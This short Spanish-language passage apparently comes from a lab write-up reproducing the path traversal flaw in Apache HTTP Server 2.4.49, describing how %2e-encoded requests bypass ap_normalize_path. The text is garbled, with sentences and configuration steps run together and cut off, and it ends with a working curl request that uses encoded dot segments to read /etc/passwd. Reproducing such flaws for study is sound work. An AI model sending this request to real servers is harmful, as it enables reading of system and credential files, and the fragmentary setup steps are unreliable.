
Reproducción de Vulnerabilidad de Path Traversal en Apache HTTP Server 2.4.49
ap_normalize_path. Un atacante puede eludir los controles de acceso mediante la construcción de solicitudes especiales que contienen codificación %2e, permitiendo leer cualquier archivo en el servidor web.<Directory /> de Require all denied a Require all granted/vuln apuntando a /tmp/vuln_dir y establecer permisoscurl -v --path-as-is 'http://127.0.0.1:8080/vuln/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd'
